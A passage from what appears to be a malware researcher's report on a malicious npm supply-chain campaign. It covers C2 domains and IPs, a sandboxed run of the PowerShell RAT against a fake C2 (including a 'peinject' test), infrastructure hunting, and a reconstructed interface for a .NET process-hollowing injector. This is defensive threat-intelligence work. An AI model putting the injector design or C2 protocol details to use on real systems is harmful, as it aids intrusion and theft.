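    {"ts": "2026-03-31T12:00:39.000Z", "kind": "write", "pid": 3100, "ppid": 1, "detail": "package.json"},
]

if __name__ == "__main__":
    for dt, finding in analyze_install(SAMPLE_EVENTS, 4000):
        print(f"+{dt:7.3f}s  {finding}")
```

The tree is built from the parent PID recorded at spawn time, so a child later orphaned to PID 1 (as nohup's was here) still attributes to the install; the final write by PID 3100 is ignored because it is outside the tree.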
packages.npm.org is NOT an npm URL
Per Semgrep's analysis, packages.npm.org (used in the POST body) is not a fake npm registry URL. The domain actually belongs to the National Association of Pastoral Musicians. The attacker used it as POST data that looks innocuous in network logs — it mimics a legitimate package registry URL but is actually just a platform identifier string sent to the C2 server.
10. Novel Findings Summary
This analysis produced several findings not present in any published vendor report:
Conclusion: V2 is the x86_64-only slice of V1 — same source code, same build environment, but without the ARM64 architecture. Submitted to VT 4 hours after V1, likely by a different researcher who extracted just the x86_64 slice from the universal binary.
Current version (0.0.132) status unknown — may have been cleaned or may still be malicious
Recommendation
These accounts should be reported to npm security for investigation and takedown. The qbot-claw-launcher package with obfuscated code and prebuilt native binaries is particularly concerning.
Correction: Attack Chain is BROKEN
While these packages remain on npm, the infection chain is non-functional:
plain-crypto-js@4.2.1 → replaced with npm security stub (0.0.1-security.0)
C2 server sfrclak.com:8000 → completely offline (all ports refuse connections)
Even if setup.js executes, it cannot download RAT payloads
The real risk is that @shadanai and @qqbrowser.dev accounts remain active and could publish new packages with a fresh C2 at any time.
13. Dynamic Analysis — Live RAT Execution on Daytona Windows Sandbox
Environment: Daytona Windows Server 2022 (QEMU/KVM, AMD EPYC 9254)
Method: Fake C2 server (PowerShell HttpListener) + live PowerShell RAT execution
Date: 2026-03-31
13.1 C2 Protocol Validated
Fake C2 captured 7+ beacons from the live RAT:
| Beacon | Type | Content |
|---|---|---|
| #1 | FirstInfo | Directory listings: Documents, Desktop, OneDrive, AppData\Roaming, all drives |
| #2 | BaseInfo | Full fingerprint: hostname=WIN-FC7GCUO5CCS, user=Administrator, OS=Server 2022, CPU=EPYC 9254, 100+ processes |
Deployed test Extension.SubRoutine DLL (C# 5, compiled on sandbox with csc.exe /target:library).
Sent peinject command via fake C2 with test DLL + 5 NOP bytes as shellcode.
Result captured in peinject_log.txt:
Run2 called at 3/31/2026 5:58:14 AM
Target: C:\Windows\system32\cmd.exe
Param: test123
Payload size: 5 bytes
Payload hex: 90-90-90-90-90
This proves:
RAT decodes Base64 IjtDll → [Assembly]::Load() → finds Extension.SubRoutine.Run2()
23.254.226.130 (hwsrv-1318856, Hostwinds) — Express+CORS on 8080, previously hosted MS365 phishing domain login.office.com.msportal.auth.*.2517333.com (Feb 2026). Server ID close to axios C2 (1923 apart) but IDs are not sequential across subnets.
142.11.239.46 (same /18) — ehlpayment.com payment domain, Express+CORS+port 8000+MongoDB. Updated March 30 same hour as sfrclak.com registration. Probed: serves Vite.js frontend (legitimate payment app).
Cloudzy 172.86.69.x cluster — shared ETag indicates same botnet panel, not related
All 26 User-Agent matches — header reflectors/honeypots
Conclusion: No confirmed active replacement C2 found. The 3 original leads (Hostwinds 23.254.167.216, Cloudzy 45.61.128.54/hopex.pro, Cloudzy 144.172.89.231/coretrade.app) remain the strongest indicators. The attacker has not deployed a detectable replacement C2 on the same infrastructure pattern.
Extension.SubRoutine .NET Injector DLL — Research Report
Date: 2026-03-31 | Status: Previously undocumented — ZERO public references
Methodology: 30+ web searches across GitHub, VT, MalwareBazaar, ANY.RUN, ASEC, WithSecure, Elastic, SANS ISC
Verdict
Extension.SubRoutine with method Run2 has zero public references in any malware analysis report, threat intelligence feed, GitHub repository, or sandbox platform. This is a custom-built .NET process injection DLL that has not been previously documented.
Search Results Summary
| Query | Results |
|---|---|
| "Extension.SubRoutine" "Run2" | 0 hits |
| "Extension.SubRoutine" process hollowing | 0 hits |
| "$rotjni" "$daolyap" malware | 0 hits |
| "IjtDll" "IjtBin" C2 | 0 hits |
| GitHub code search: Extension.SubRoutine | 0 repositories |
| MalwareBazaar / ANY.RUN / Hybrid Analysis | 0 samples |
| Joe Desimone gist | macOS only — does not mention Windows DLL |
Reconstructed Interface
// Based on PowerShell RAT source code analysis
namespace Extension
{
    public class SubRoutine
    {
        // Process hollowing into target executable
        // payload: shellcode/PE to inject
        // targetExe: "C:\Windows\System32\cmd.exe"
        // param: additional C2 parameters
        public static void Run2(byte[] payload, string targetExe, string param);
    }
}
Closest Known Pattern: BlueCrab/REvil .NET Injector